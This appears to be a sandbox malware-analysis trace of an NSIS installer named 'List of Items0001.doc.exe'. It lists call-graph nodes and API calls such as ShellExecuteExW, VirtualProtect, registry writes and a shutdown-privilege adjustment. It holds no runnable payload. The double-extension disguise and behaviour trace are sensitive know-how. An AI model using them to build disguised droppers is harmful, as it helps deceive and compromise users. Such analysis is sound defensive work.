GetFileAttributesW CreateFileW 5048->5068 5052 403371 44 API calls 5049->5052 5050 4056ca 24 API calls 5053 401879 5050->5053 5051->5048 5054 4018aa 5052->5054 5055 4018be SetFileTime 5054->5055 5057 4018d0 CloseHandle 5054->5057 5055->5057 5056->5048 5057->5053 5058 4018e1 5057->5058 5059 4018e6 5058->5059 5060 4018f9 5058->5060 5061 4066a5 17 API calls 5059->5061 5062 4066a5 17 API calls 5060->5062 5064 4018ee lstrcatW 5061->5064 5065 401901 5062->5065 5063->5048 5064->5065 5065->5053 5066 405cc8 MessageBoxIndirectW 5065->5066 5066->5053 5067->5050 5067->5053 5068->5048 5069->5036 5070->5037 5557 401a72 5558 402d84 17 API calls 5557->5558 5559 401a7b 5558->5559 5560 402d84 17 API calls 5559->5560 5561 401a20 5560->5561 5562 401573 5563 401583 ShowWindow 5562->5563 5564 40158c 5562->5564 5563->5564 5565 402c2a 5564->5565 5566 40159a ShowWindow 5564->5566 5566->5565 5567 4023f4 5568 402da6 17 API calls 5567->5568 5569 402403 5568->5569 5570 402da6 17 API calls 5569->5570 5571 40240c 5570->5571 5572 402da6 17 API calls 5571->5572 5573 402416 GetPrivateProfileStringW 5572->5573 5574 4014f5 SetForegroundWindow 5575 402c2a 5574->5575 5576 6db61000 5577 6db6101b 5 API calls 5576->5577 5578 6db61019 5577->5578 5579 401ff6 5580 402da6 17 API calls 5579->5580 5581 401ffd 5580->5581 5582 40699e 2 API calls 5581->5582 5583 402003 5582->5583 5585 402014 5583->5585 5586 4065af wsprintfW 5583->5586 5586->5585 5587 401b77 5588 402da6 17 API calls 5587->5588 5589 401b7e 5588->5589 5590 402d84 17 API calls 5589->5590 5591 401b87 wsprintfW 5590->5591 5592 402c2a 5591->5592 5593 4046fa lstrcpynW lstrlenW 5308 40167b 5309 402da6 17 API calls 5308->5309 5310 401682 5309->5310 5311 402da6 17 API calls 5310->5311 5312 40168b 5311->5312 5313 402da6 17 API calls 5312->5313 5314 401694 MoveFileW 5313->5314 5315 4016a0 5314->5315 5316 4016a7 5314->5316 5317 401423 24 API calls 5315->5317 5318 40699e 2 API calls 5316->5318 5320 4022f6 5316->5320 5317->5320 5319 4016b6 5318->5319 5319->5320 
5321 406428 36 API calls 5319->5321 5321->5315 5594 6db6170d 5595 6db615b6 GlobalFree 5594->5595 5597 6db61725 5595->5597 5596 6db6176b GlobalFree 5597->5596 5598 6db61740 5597->5598 5599 6db61757 VirtualFree 5597->5599 5598->5596 5599->5596 5607 4022ff 5608 402da6 17 API calls 5607->5608 5609 402305 5608->5609 5610 402da6 17 API calls 5609->5610 5611 40230e 5610->5611 5612 402da6 17 API calls 5611->5612 5613 402317 5612->5613 5614 40699e 2 API calls 5613->5614 5615 402320 5614->5615 5616 402331 lstrlenW lstrlenW 5615->5616 5617 402324 5615->5617 5619 4056ca 24 API calls 5616->5619 5618 4056ca 24 API calls 5617->5618 5621 40232c 5617->5621 5618->5621 5620 40236f SHFileOperationW 5619->5620 5620->5617 5620->5621 5622 4019ff 5623 402da6 17 API calls 5622->5623 5624 401a06 5623->5624 5625 402da6 17 API calls 5624->5625 5626 401a0f 5625->5626 5627 401a16 lstrcmpiW 5626->5627 5628 401a28 lstrcmpW 5626->5628 5629 401a1c 5627->5629 5628->5629 5630 401000 5631 401037 BeginPaint GetClientRect 5630->5631 5633 40100c DefWindowProcW 5630->5633 5634 4010f3 5631->5634 5635 401179 5633->5635 5636 401073 CreateBrushIndirect FillRect DeleteObject 5634->5636 5637 4010fc 5634->5637 5636->5634 5638 401102 CreateFontIndirectW 5637->5638 5639 401167 EndPaint 5637->5639 5638->5639 5640 401112 6 API calls 5638->5640 5639->5635 5640->5639 5641 401d81 5642 401d94 GetDlgItem 5641->5642 5643 401d87 5641->5643 5646 401d8e 5642->5646 5644 402d84 17 API calls 5643->5644 5644->5646 5645 401dd5 GetClientRect LoadImageW SendMessageW 5649 401e33 5645->5649 5651 401e3f 5645->5651 5646->5645 5647 402da6 17 API calls 5646->5647 5647->5645 5650 401e38 DeleteObject 5649->5650 5649->5651 5650->5651 5652 6db61774 5653 6db617a3 5652->5653 5654 6db61bff 22 API calls 5653->5654 5655 6db617aa 5654->5655 5656 6db617b1 5655->5656 5657 6db617bd 5655->5657 5658 6db61312 2 API calls 5656->5658 5659 6db617c7 5657->5659 5660 6db617e4 5657->5660 5663 6db617bb 5658->5663 5664 6db615dd 3 API calls 5659->5664 5661 
6db6180e 5660->5661 5662 6db617ea 5660->5662 5666 6db615dd 3 API calls 5661->5666 5665 6db61654 3 API calls 5662->5665 5667 6db617cc 5664->5667 5668 6db617ef 5665->5668 5666->5663 5669 6db61654 3 API calls 5667->5669 5670 6db61312 2 API calls 5668->5670 5671 6db617d2 5669->5671 5672 6db617f5 GlobalFree 5670->5672 5673 6db61312 2 API calls 5671->5673 5672->5663 5675 6db61809 GlobalFree 5672->5675 5674 6db617d8 GlobalFree 5673->5674 5674->5663 5675->5663 5676 401503 5677 40150b 5676->5677 5679 40151e 5676->5679 5678 402d84 17 API calls 5677->5678 5678->5679 5680 404783 5681 40479b 5680->5681 5684 4048b5 5680->5684 5685 4045c4 18 API calls 5681->5685 5682 40491f 5683 404929 GetDlgItem 5682->5683 5686 4049e9 5682->5686 5687 404943 5683->5687 5688 4049aa 5683->5688 5684->5682 5684->5686 5689 4048f0 GetDlgItem SendMessageW 5684->5689 5690 404802 5685->5690 5691 40462b 8 API calls 5686->5691 5687->5688 5696 404969 SendMessageW LoadCursorW SetCursor 5687->5696 5688->5686 5692 4049bc 5688->5692 5713 4045e6 KiUserCallbackDispatcher 5689->5713 5694 4045c4 18 API calls 5690->5694 5695 4049e4 5691->5695 5697 4049d2 5692->5697 5698 4049c2 SendMessageW 5692->5698 5700 40480f CheckDlgButton 5694->5700 5717 404a32 5696->5717 5697->5695 5703 4049d8 SendMessageW 5697->5703 5698->5697 5699 40491a 5714 404a0e 5699->5714 5711 4045e6 KiUserCallbackDispatcher 5700->5711 5703->5695 5706 40482d GetDlgItem 5712 4045f9 SendMessageW 5706->5712 5708 404843 SendMessageW 5709 404860 GetSysColor 5708->5709 5710 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5708->5710 5709->5710 5710->5695 5711->5706 5712->5708 5713->5699 5715 404a21 SendMessageW 5714->5715 5716 404a1c 5714->5716 5715->5682 5716->5715 5720 405c8e ShellExecuteExW 5717->5720 5719 404998 LoadCursorW SetCursor 5719->5688 5720->5719 5721 402383 5722 40238a 5721->5722 5725 40239d 5721->5725 5723 4066a5 17 API calls 5722->5723 5724 402397 5723->5724 5724->5725 5726 405cc8 MessageBoxIndirectW 5724->5726 5726->5725 
5727 402c05 SendMessageW 5728 402c2a 5727->5728 5729 402c1f InvalidateRect 5727->5729 5729->5728 4907 405809 4908 4059b3 4907->4908 4909 40582a GetDlgItem GetDlgItem GetDlgItem 4907->4909 4911 4059e4 4908->4911 4912 4059bc GetDlgItem CreateThread CloseHandle 4908->4912 4953 4045f9 SendMessageW 4909->4953 4913 405a0f 4911->4913 4915 405a34 4911->4915 4916 4059fb ShowWindow ShowWindow 4911->4916 4912->4911 4956 40579d 5 API calls 4912->4956 4917 405a1b 4913->4917 4919 405a6f 4913->4919 4914 40589a 4918 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4914->4918 4923 40462b 8 API calls 4915->4923 4955 4045f9 SendMessageW 4916->4955 4921 405a23 4917->4921 4922 405a49 ShowWindow 4917->4922 4924 4058f3 SendMessageW SendMessageW 4918->4924 4925 40590f 4918->4925 4919->4915 4926 405a7d SendMessageW 4919->4926 4927 40459d SendMessageW 4921->4927 4929 405a69 4922->4929 4930 405a5b 4922->4930 4928 405a42 4923->4928 4924->4925 4931 405922 4925->4931 4932 405914 SendMessageW 4925->4932 4926->4928 4933 405a96 CreatePopupMenu 4926->4933 4927->4915 4935 40459d SendMessageW 4929->4935 4934 4056ca 24 API calls 4930->4934 4937 4045c4 18 API calls 4931->4937 4932->4931 4936 4066a5 17 API calls 4933->4936 4934->4929 4935->4919 4938 405aa6 AppendMenuW 4936->4938 4939 405932 4937->4939 4940 405ac3 GetWindowRect 4938->4940 4941 405ad6 TrackPopupMenu 4938->4941 4942 40593b ShowWindow 4939->4942 4943 40596f GetDlgItem SendMessageW 4939->4943 4940->4941 4941->4928 4944 405af1 4941->4944 4945 405951 ShowWindow 4942->4945 4948 40595e 4942->4948 4943->4928 4946 405996 SendMessageW SendMessageW 4943->4946 4947 405b0d SendMessageW 4944->4947 4945->4948 4946->4928 4947->4947 4949 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4947->4949 4954 4045f9 SendMessageW 4948->4954 4951 405b4f SendMessageW 4949->4951 4951->4951 4952 405b78 GlobalUnlock SetClipboardData CloseClipboard 4951->4952 4952->4928 4953->4914 4954->4943 4955->4913 4957 6db62a7f 4958 6db62acf 4957->4958 4959 
6db62a8f VirtualProtect 4957->4959 4959->4958 4977 40248a 4978 402da6 17 API calls 4977->4978 4979 40249c 4978->4979 4980 402da6 17 API calls 4979->4980 4981 4024a6 4980->4981 4994 402e36 4981->4994 4984 402c2a 4985 4024de 4989 4024ea 4985->4989 4998 402d84 4985->4998 4986 402da6 17 API calls 4990 4024d4 lstrlenW 4986->4990 4988 402509 RegSetValueExW 4992 40251f RegCloseKey 4988->4992 4989->4988 4991 403371 44 API calls 4989->4991 4990->4985 4991->4988 4992->4984 4995 402e51 4994->4995 5001 406503 4995->5001 4999 4066a5 17 API calls 4998->4999 5000 402d99 4999->5000 5000->4989 5002 406512 5001->5002 5003 4024b6 5002->5003 5004 40651d RegCreateKeyExW 5002->5004 5003->4984 5003->4985 5003->4986 5004->5003 5730 404e0b 5731 404e37 5730->5731 5732 404e1b 5730->5732 5734 404e6a 5731->5734 5735 404e3d SHGetPathFromIDListW 5731->5735 5741 405cac GetDlgItemTextW 5732->5741 5737 404e54 SendMessageW 5735->5737 5738 404e4d 5735->5738 5736 404e28 SendMessageW 5736->5731 5737->5734 5740 40140b 2 API calls 5738->5740 5740->5737 5741->5736 5742 40290b 5743 402da6 17 API calls 5742->5743 5744 402912 FindFirstFileW 5743->5744 5745 402925 5744->5745 5746 40293a 5744->5746 5747 402943 5746->5747 5750 4065af wsprintfW 5746->5750 5751 406668 lstrcpynW 5747->5751 5750->5747 5751->5745 5752 40190c 5753 401943 5752->5753 5754 402da6 17 API calls 5753->5754 5755 401948 5754->5755 5756 405d74 67 API calls 5755->5756 5757 401951 5756->5757 5758 40190f 5759 402da6 17 API calls 5758->5759 5760 401916 5759->5760 5761 405cc8 MessageBoxIndirectW 5760->5761 5762 40191f 5761->5762 5763 6db61979 5765 6db6199c 5763->5765 5764 6db619e3 5767 6db61312 2 API calls 5764->5767 5765->5764 5766 6db619d1 GlobalFree 5765->5766 5766->5764 5768 6db61b6e GlobalFree GlobalFree 5767->5768 5071 402891 5072 402898 5071->5072 5073 402ba9 5071->5073 5074 402d84 17 API calls 5072->5074 5075 40289f 5074->5075 5076 4028ae SetFilePointer 5075->5076 5076->5073 5077 4028be 5076->5077 5079 4065af wsprintfW 5077->5079 
5079->5073 5769 401491 5770 4056ca 24 API calls 5769->5770 5771 401498 5770->5771 5772 401f12 5773 402da6 17 API calls 5772->5773 5774 401f18 5773->5774 5775 402da6 17 API calls 5774->5775 5776 401f21 5775->5776 5777 402da6 17 API calls 5776->5777 5778 401f2a 5777->5778 5779 402da6 17 API calls 5778->5779 5780 401f33 5779->5780 5781 401423 24 API calls 5780->5781 5782 401f3a 5781->5782 5789 405c8e ShellExecuteExW 5782->5789 5784 401f82 5785 406ae0 5 API calls 5784->5785 5786 40292e 5784->5786 5787 401f9f CloseHandle 5785->5787 5787->5786 5789->5784 5790 402f93 5791 402fa5 SetTimer 5790->5791 5792 402fbe 5790->5792 5791->5792 5793 40300c 5792->5793 5794 403012 MulDiv 5792->5794 5795 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 5794->5795 5795->5793 5811 6db610e1 5817 6db61111 5811->5817 5812 6db612b0 GlobalFree 5813 6db611d7 GlobalAlloc 5813->5817 5814 6db61240 GlobalFree 5814->5817 5815 6db6135a 2 API calls 5815->5817 5816 6db612ab 5816->5812 5817->5812 5817->5813 5817->5814 5817->5815 5817->5816 5818 6db61312 2 API calls 5817->5818 5819 6db6129a GlobalFree 5817->5819 5820 6db6116b GlobalAlloc 5817->5820 5821 6db61381 lstrcpyW 5817->5821 5818->5817 5819->5817 5820->5817 5821->5817 5822 401d17 5823 402d84 17 API calls 5822->5823 5824 401d1d IsWindow 5823->5824 5825 401a20 5824->5825 5826 401b9b 5827 401ba8 5826->5827 5828 401bec 5826->5828 5829 401c31 5827->5829 5834 401bbf 5827->5834 5830 401bf1 5828->5830 5831 401c16 GlobalAlloc 5828->5831 5832 4066a5 17 API calls 5829->5832 5839 40239d 5829->5839 5830->5839 5847 406668 lstrcpynW 5830->5847 5833 4066a5 17 API calls 5831->5833 5836 402397 5832->5836 5833->5829 5845 406668 lstrcpynW 5834->5845 5836->5839 5840 405cc8 MessageBoxIndirectW 5836->5840 5838 401c03 GlobalFree 5838->5839 5840->5839 5841 401bce 5846 406668 lstrcpynW 5841->5846 5843 401bdd 5848 406668 lstrcpynW 5843->5848 5845->5841 5846->5843 5847->5838 5848->5839 5849 40261c 5850 402da6 17 API calls 5849->5850 5851 402623 5850->5851 5854 406158 
GetFileAttributesW CreateFileW 5851->5854 5853 40262f 5854->5853 5336 40259e 5337 402de6 17 API calls 5336->5337 5338 4025a8 5337->5338 5339 402d84 17 API calls 5338->5339 5340 4025b1 5339->5340 5341 4025c0 5340->5341 5345 40292e 5340->5345 5342 4025d9 RegEnumValueW 5341->5342 5343 4025cd RegEnumKeyW 5341->5343 5344 4025ee 5342->5344 5346 4025f5 RegCloseKey 5342->5346 5343->5346 5344->5346 5346->5345 5862 40149e 5863 4014ac PostQuitMessage 5862->5863 5864 40239d 5862->5864 5863->5864 5865 6db623e9 5866 6db62453 5865->5866 5867 6db6245e GlobalAlloc 5866->5867 5868 6db6247d 5866->5868 5867->5866 4786 4015a3 4787 402da6 17 API calls 4786->4787 4788 4015aa SetFileAttributesW 4787->4788 4789 4015bc 4788->4789 4790 401fa4 4791 402da6 17 API calls 4790->4791 4792 401faa 4791->4792 4793 4056ca 24 API calls 4792->4793 4794 401fb4 4793->4794 4795 405c4b 2 API calls 4794->4795 4796 401fba 4795->4796 4797 401fdd CloseHandle 4796->4797 4800 40292e 4796->4800 4805 406ae0 WaitForSingleObject 4796->4805 4797->4800 4801 401fcf 4802 401fd4 4801->4802 4803 401fdf 4801->4803 4810 4065af wsprintfW 4802->4810 4803->4797 4806 406afa 4805->4806 4807 406b0c GetExitCodeProcess 4806->4807 4808 406a71 2 API calls 4806->4808 4807->4801 4809 406b01 WaitForSingleObject 4808->4809 4809->4806 4810->4797 4960 40252a 4971 402de6 4960->4971 4963 402da6 17 API calls 4964 40253d 4963->4964 4965 402548 RegQueryValueExW 4964->4965 4966 40292e 4964->4966 4967 402568 4965->4967 4970 40256e RegCloseKey 4965->4970 4967->4970 4976 4065af wsprintfW 4967->4976 4970->4966 4972 402da6 17 API calls 4971->4972 4973 402dfd 4972->4973 4974 4064d5 RegOpenKeyExW 4973->4974 4975 402534 4974->4975 4975->4963 4976->4970 5869 40202a 5870 402da6 17 API calls 5869->5870 5871 402031 5870->5871 5872 406a35 5 API calls 5871->5872 5873 402040 5872->5873 5874 4020cc 5873->5874 5875 40205c GlobalAlloc 5873->5875 5875->5874 5876 402070 5875->5876 5877 406a35 5 API calls 5876->5877 5878 402077 5877->5878 5879 406a35 5 API calls 
5878->5879 5880 402081 5879->5880 5880->5874 5884 4065af wsprintfW 5880->5884 5882 4020ba 5885 4065af wsprintfW 5882->5885 5884->5882 5885->5874 5886 4021aa 5887 402da6 17 API calls 5886->5887 5888 4021b1 5887->5888 5889 402da6 17 API calls 5888->5889 5890 4021bb 5889->5890 5891 402da6 17 API calls 5890->5891 5892 4021c5 5891->5892 5893 402da6 17 API calls 5892->5893 5894 4021cf 5893->5894 5895 402da6 17 API calls 5894->5895 5896 4021d9 5895->5896 5897 402218 CoCreateInstance 5896->5897 5898 402da6 17 API calls 5896->5898 5901 402237 5897->5901 5898->5897 5899 401423 24 API calls 5900 4022f6 5899->5900 5901->5899 5901->5900 5909 6db61058 5912 6db61074 5909->5912 5910 6db610dd 5911 6db61092 5914 6db615b6 GlobalFree 5911->5914 5912->5910 5912->5911 5913 6db615b6 GlobalFree 5912->5913 5913->5911 5915 6db610a2 5914->5915 5916 6db610b2 5915->5916 5917 6db610a9 GlobalSize 5915->5917 5918 6db610b6 GlobalAlloc 5916->5918 5919 6db610c7 5916->5919 5917->5916 5920 6db615dd 3 API calls 5918->5920 5921 6db610d2 GlobalFree 5919->5921 5920->5919 5921->5910 5922 401a30 5923 402da6 17 API calls 5922->5923 5924 401a39 ExpandEnvironmentStringsW 5923->5924 5925 401a4d 5924->5925 5927 401a60 5924->5927 5926 401a52 lstrcmpW 5925->5926 5925->5927 5926->5927 5928 405031 GetDlgItem GetDlgItem 5929 405083 7 API calls 5928->5929 5935 4052a8 5928->5935 5930 40512a DeleteObject 5929->5930 5931 40511d SendMessageW 5929->5931 5932 405133 5930->5932 5931->5930 5933 40516a 5932->5933 5936 4066a5 17 API calls 5932->5936 5937 4045c4 18 API calls 5933->5937 5934 40538a 5938 405436 5934->5938 5948 4053e3 SendMessageW 5934->5948 5968 40529b 5934->5968 5935->5934 5943 405317 5935->5943 5982 404f7f SendMessageW 5935->5982 5941 40514c SendMessageW SendMessageW 5936->5941 5942 40517e 5937->5942 5939 405440 SendMessageW 5938->5939 5940 405448 5938->5940 5939->5940 5950 405461 5940->5950 5951 40545a ImageList_Destroy 5940->5951 5958 405471 5940->5958 5941->5932 5947 4045c4 18 API calls 5942->5947 5943->5934 
5944 40537c SendMessageW 5943->5944 5944->5934 5945 40462b 8 API calls 5949 405637 5945->5949 5962 40518f 5947->5962 5953 4053f8 SendMessageW 5948->5953 5948->5968 5954 40546a GlobalFree 5950->5954 5950->5958 5951->5950 5952 4055eb 5959 4055fd ShowWindow GetDlgItem ShowWindow 5952->5959 5952->5968 5956 40540b 5953->5956 5954->5958 5955 40526a GetWindowLongW SetWindowLongW 5957 405283 5955->5957 5967 40541c SendMessageW 5956->5967 5960 4052a0 5957->5960 5961 405288 ShowWindow 5957->5961 5958->5952 5975 4054ac 5958->5975 5987 404fff 5958->5987 5959->5968 5981 4045f9 SendMessageW 5960->5981 5980 4045f9 SendMessageW 5961->5980 5962->5955 5963 405265 5962->5963 5966 4051e2 SendMessageW 5962->5966 5969 405220 SendMessageW 5962->5969 5970 405234 SendMessageW 5962->5970 5963->5955 5963->5957 5966->5962 5967->5938 5968->5945 5969->5962 5970->5962 5972 4055b6 5973 4055c1 InvalidateRect 5972->5973 5977 4055cd 5972->5977 5973->5977 5974 4054da SendMessageW 5976 4054f0 5974->5976 5975->5974 5975->5976 5976->5972 5978 405564 SendMessageW SendMessageW 5976->5978 5977->5952 5996 404f3a 5977->5996 5978->5976 5980->5968 5981->5935 5983 404fa2 GetMessagePos ScreenToClient SendMessageW 5982->5983 5984 404fde SendMessageW 5982->5984 5985 404fd6 5983->5985 5986 404fdb 5983->5986 5984->5985 5985->5943 5986->5984 5999 406668 lstrcpynW 5987->5999 5989 405012 6000 4065af wsprintfW 5989->6000 5991 40501c 5992 40140b 2 API calls 5991->5992 5993 405025 5992->5993 6001 406668 lstrcpynW 5993->6001 5995 40502c 5995->5975 6002 404e71 5996->6002 5998 404f4f 5998->5952 5999->5989 6000->5991 6001->5995 6003 404e8a 6002->6003 6004 4066a5 17 API calls 6003->6004 6005 404eee 6004->6005 6006 4066a5 17 API calls 6005->6006 6007 404ef9 6006->6007 6008 4066a5 17 API calls 6007->6008 6009 404f0f lstrlenW wsprintfW SetDlgItemTextW 6008->6009 6009->5998 6015 4023b2 6016 4023c0 6015->6016 6017 4023ba 6015->6017 6019 4023ce 6016->6019 6021 402da6 17 API calls 6016->6021 6018 402da6 17 API calls 6017->6018 
6018->6016 6020 4023dc 6019->6020 6022 402da6 17 API calls 6019->6022 6023 402da6 17 API calls 6020->6023 6021->6019 6022->6020 6024 4023e5 WritePrivateProfileStringW 6023->6024 5080 402434 5081 402467 5080->5081 5082 40243c 5080->5082 5084 402da6 17 API calls 5081->5084 5083 402de6 17 API calls 5082->5083 5085 402443 5083->5085 5086 40246e 5084->5086 5087 40244d 5085->5087 5090 40247b 5085->5090 5092 402e64 5086->5092 5089 402da6 17 API calls 5087->5089 5091 402454 RegDeleteValueW RegCloseKey 5089->5091 5091->5090 5093 402e71 5092->5093 5094 402e78 5092->5094 5093->5090 5094->5093 5096 402ea9 5094->5096 5097 4064d5 RegOpenKeyExW 5096->5097 5098 402ed7 5097->5098 5099 402ee1 5098->5099 5100 402f8c 5098->5100 5101 402ee7 RegEnumValueW 5099->5101 5110 402f0a 5099->5110 5100->5093 5102 402f71 RegCloseKey 5101->5102 5101->5110 5102->5100 5103 402f46 RegEnumKeyW 5104 402f4f RegCloseKey 5103->5104 5103->5110 5105 406a35 5 API calls 5104->5105 5107 402f5f 5105->5107 5106 402ea9 6 API calls 5106->5110 5108 402f81 5107->5108 5109 402f63 RegDeleteKeyW 5107->5109 5108->5100 5109->5100 5110->5102 5110->5103 5110->5104 5110->5106 6025 404734 lstrlenW 6026 404753 6025->6026 6027 404755 WideCharToMultiByte 6025->6027 6026->6027 6028 401735 6029 402da6 17 API calls 6028->6029 6030 40173c SearchPathW 6029->6030 6031 401757 6030->6031 6032 6db62d43 6033 6db62d5b 6032->6033 6034 6db6162f 2 API calls 6033->6034 6035 6db62d76 6034->6035 6036 404ab5 6037 404ae1 6036->6037 6038 404af2 6036->6038 6097 405cac GetDlgItemTextW 6037->6097 6039 404afe GetDlgItem 6038->6039 6046 404b5d 6038->6046 6042 404b12 6039->6042 6041 404aec 6044 4068ef 5 API calls 6041->6044 6045 404b26 SetWindowTextW 6042->6045 6049 405fe2 4 API calls 6042->6049 6043 404c41 6095 404df0 6043->6095 6099 405cac GetDlgItemTextW 6043->6099 6044->6038 6050 4045c4 18 API calls 6045->6050 6046->6043 6051 4066a5 17 API calls 6046->6051 6046->6095 6048 40462b 8 API calls 6053 404e04 6048->6053 6054 404b1c 6049->6054 6055 404b42 
6050->6055 6056 404bd1 SHBrowseForFolderW 6051->6056 6052 404c71 6057 40603f 18 API calls 6052->6057 6054->6045 6061 405f37 3 API calls 6054->6061 6058 4045c4 18 API calls 6055->6058 6056->6043 6059 404be9 CoTaskMemFree 6056->6059 6060 404c77 6057->6060 6062 404b50 6058->6062 6063 405f37 3 API calls 6059->6063 6100 406668 lstrcpynW 6060->6100 6061->6045 6098 4045f9 SendMessageW 6062->6098 6065 404bf6 6063->6065 6068 404c2d SetDlgItemTextW 6065->6068 6072 4066a5 17 API calls 6065->6072 6067 404b56 6070 406a35 5 API calls 6067->6070 6068->6043 6069 404c8e 6071 406a35 5 API calls 6069->6071 6070->6046 6083 404c95 6071->6083 6073 404c15 lstrcmpiW 6072->6073 6073->6068 6075 404c26 lstrcatW 6073->6075 6074 404cd6 6101 406668 lstrcpynW 6074->6101 6075->6068 6077 404cdd 6078 405fe2 4 API calls 6077->6078 6079 404ce3 GetDiskFreeSpaceW 6078->6079 6081 404d07 MulDiv 6079->6081 6084 404d2e 6079->6084 6081->6084 6082 405f83 2 API calls 6082->6083 6083->6074 6083->6082 6083->6084 6085 404d9f 6084->6085 6086 404f3a 20 API calls 6084->6086 6087 404dc2 6085->6087 6089 40140b 2 API calls 6085->6089 6088 404d8c 6086->6088 6102 4045e6 KiUserCallbackDispatcher 6087->6102 6090 404da1 SetDlgItemTextW 6088->6090 6091 404d91 6088->6091 6089->6087 6090->6085 6093 404e71 20 API calls 6091->6093 6093->6085 6094 404dde 6094->6095 6096 404a0e SendMessageW 6094->6096 6095->6048 6096->6095 6097->6041 6098->6067 6099->6052 6100->6069 6101->6077 6102->6094 6103 401d38 6104 402d84 17 API calls 6103->6104 6105 401d3f 6104->6105 6106 402d84 17 API calls 6105->6106 6107 401d4b GetDlgItem 6106->6107 6108 402638 6107->6108 6109 4014b8 6110 4014be 6109->6110 6111 401389 2 API calls 6110->6111 6112 4014c6 6111->6112 6113 40563e 6114 405662 6113->6114 6115 40564e 6113->6115 6117 40566a IsWindowVisible 6114->6117 6123 405681 6114->6123 6116 405654 6115->6116 6125 4056ab 6115->6125 6120 404610 SendMessageW 6116->6120 6118 405677 6117->6118 6117->6125 6121 404f7f 5 API calls 6118->6121 6119 4056b0 
CallWindowProcW 6122 40565e 6119->6122 6120->6122 6121->6123 6123->6119 6124 404fff 4 API calls 6123->6124 6124->6125 6125->6119 6126 40263e 6127 402652 6126->6127 6128 40266d 6126->6128 6131 402d84 17 API calls 6127->6131 6129 402672 6128->6129 6130 40269d 6128->6130 6132 402da6 17 API calls 6129->6132 6133 402da6 17 API calls 6130->6133 6134 402659 6131->6134 6135 402679 6132->6135 6136 4026a4 lstrlenW 6133->6136 6139 4026d1 6134->6139 6141 4026e7 6134->6141 6142 406239 5 API calls 6134->6142 6143 40668a WideCharToMultiByte 6135->6143 6136->6134 6138 40268d lstrlenA 6138->6134 6140 40620a WriteFile 6139->6140 6139->6141 6140->6141 6142->6139 6143->6138

                                                Control-flow Graph

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                • OleInitialize.OLE32(00000000), ref: 0040377D
                                                • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\List of Items0001.doc.exe",00000020,"C:\Users\user\Desktop\List of Items0001.doc.exe",00000000), ref: 004037E9
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\List of Items0001.doc.exe",00000000,?), ref: 00403A69
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\List of Items0001.doc.exe",00000000,?), ref: 00403A78
                                                  • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\List of Items0001.doc.exe",00000000,?), ref: 00403A83
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\List of Items0001.doc.exe",00000000,?), ref: 00403A8F
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\List of Items0001.doc.exe,00420F08,00000001), ref: 00403B21
                                                • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                • OleUninitialize.OLE32(?), ref: 00403B71
                                                • ExitProcess.KERNEL32 ref: 00403B8B
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                • ExitProcess.KERNEL32 ref: 00403C1F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmp
